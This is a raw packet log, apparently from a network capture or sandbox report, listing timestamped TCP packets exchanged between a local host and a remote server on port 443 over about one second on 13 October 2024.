Oct 13, 2024 18:15:15.565385103 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.565434933 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.565454006 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.565479040 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.612416029 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.612430096 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.652008057 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.652025938 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.652076006 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.652092934 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.652123928 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.653506041 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.653573990 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.653582096 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.653635025 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.653662920 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.654746056 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.654758930 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.654815912 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.654829979 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.656754017 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.656774998 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.656829119 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.656845093 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.656894922 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.740601063 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.740618944 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.740675926 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.740685940 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.740710020 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.740732908 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.741836071 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.741854906 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.741911888 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.741925001 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.741955042 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.742665052 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.742680073 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.742727995 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.742741108 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.742765903 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.743665934 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.743684053 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.743726969 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.743738890 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.743765116 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.745089054 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.745102882 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.745141029 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.745152950 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.745178938 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.746074915 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.746093035 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.746133089 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.746145964 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.746171951 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.799923897 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.829534054 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.829549074 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.829607010 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.829621077 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.829673052 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.830043077 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.830056906 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.830111027 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.830122948 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.830172062 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.830678940 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.830691099 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.830743074 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.830754042 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.830809116 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.831244946 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.831259966 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.831305027 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.831319094 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.831372023 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.831429005 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.831824064 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.831836939 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.831891060 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.831904888 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.831954956 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.835692883 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.836149931 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.836162090 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.836218119 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.836231947 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.836673021 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.836688995 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.836731911 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.836751938 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.836776018 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.869662046 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.869673967 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.869721889 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.869736910 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.869764090 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.909301043 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.918363094 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.918370008 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.918431997 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.918447018 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.918514013 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.918526888 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.918874979 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.918891907 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.918932915 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.918946981 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.918972969 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.919533014 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.919557095 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.919593096 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.919611931 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.919636011 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.919657946 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.920234919 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.920248985 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.920300961 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.920305967 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.920361042 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.920381069 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.920384884 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.920402050 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.920433044 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.920452118 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.920476913 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.921252012 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.921262026 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.921294928 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.921307087 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.921334982 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.921860933 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.921880960 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.921919107 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.921936989 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.921966076 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.971800089 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.007373095 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.007399082 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.007445097 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.007492065 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.007569075 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.007606030 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.007606030 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.007852077 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.007869005 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.007905960 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.007924080 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.007956028 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.008425951 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.008450031 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.008488894 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.008502007 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.008529902 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.008555889 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.008974075 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.008989096 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.009042025 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.009057045 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.009113073 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.009202957 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.009637117 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.009650946 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.009696007 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.009716034 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.009738922 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.010401011 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.010418892 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.010457993 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.010471106 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.010498047 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.010925055 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.010938883 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.010978937 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.010992050 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.011019945 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.047679901 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.047696114 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.047734022 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.047749043 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.047775984 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.096431017 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.096441984 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.096498013 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.096512079 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.096961021 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.096981049 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.097018957 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.097040892 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.097090960 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.097120047 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.097120047 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.097523928 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.097534895 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.097587109 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.097600937 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.098179102 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.098191023 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.098236084 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.098249912 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.098277092 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.098597050 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.098608017 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.098654032 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.098668098 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.099343061 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.099359989 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.099440098 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.099456072 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.099666119 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.099677086 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.099720001 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.099740982 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.099765062 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.143671036 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.185097933 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.185113907 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.185165882 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.185184956 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.185216904 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.185256004 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.185614109 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.185627937 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.185679913 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.185687065 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.185697079 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.185698032 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.185740948 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.186256886 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.186269999 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.186291933 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.186321020 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.186342001 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.186364889 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.186933994 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.186952114 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.186989069 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.187001944 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.187024117 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.187028885 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.187052011 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.187073946 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.187087059 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.187113047 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.187684059 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.187706947 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.187758923 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.187777042 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.187805891 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.188410997 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.188424110 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.188491106 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.188505888 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.224972963 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.224988937 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.225030899 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.225047112 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.225074053 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.268667936 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.274049044 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.274055958 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.274111032 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.274128914 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.274166107 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.274199963 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.274648905 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.274666071 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.274705887 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.274724960 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.274749041 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.275279999 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.275291920 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.275341988 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.275355101 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.275800943 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.275818110 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.275852919 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.275866032 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.275896072 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.276371956 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.276396036 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.276441097 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.276454926 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.276483059 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.277040958 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.277055979 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.277103901 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.277122974 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.277147055 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.277446032 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.277456999 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.277512074 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.277524948 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.331176043 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.362766027 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.362783909 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.362840891 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.362875938 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.362935066 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.362965107 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.362965107 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.363293886 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.363310099 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.363343954 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.363356113 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.363413095 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.363972902 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.363985062 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.364038944 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.364067078 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.364451885 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.364469051 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.364511967 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.364525080 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.364552975 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.365086079 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.365098953 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.365165949 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.365179062 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.365679979 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.365695953 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.365739107 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.365751982 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.365777969 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.366194010 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.366206884 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.366277933 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.366291046 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.403065920 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.403080940 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:16.403212070 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:16.403212070 CEST	49735	443	192.168.2.4	52.217.90.148
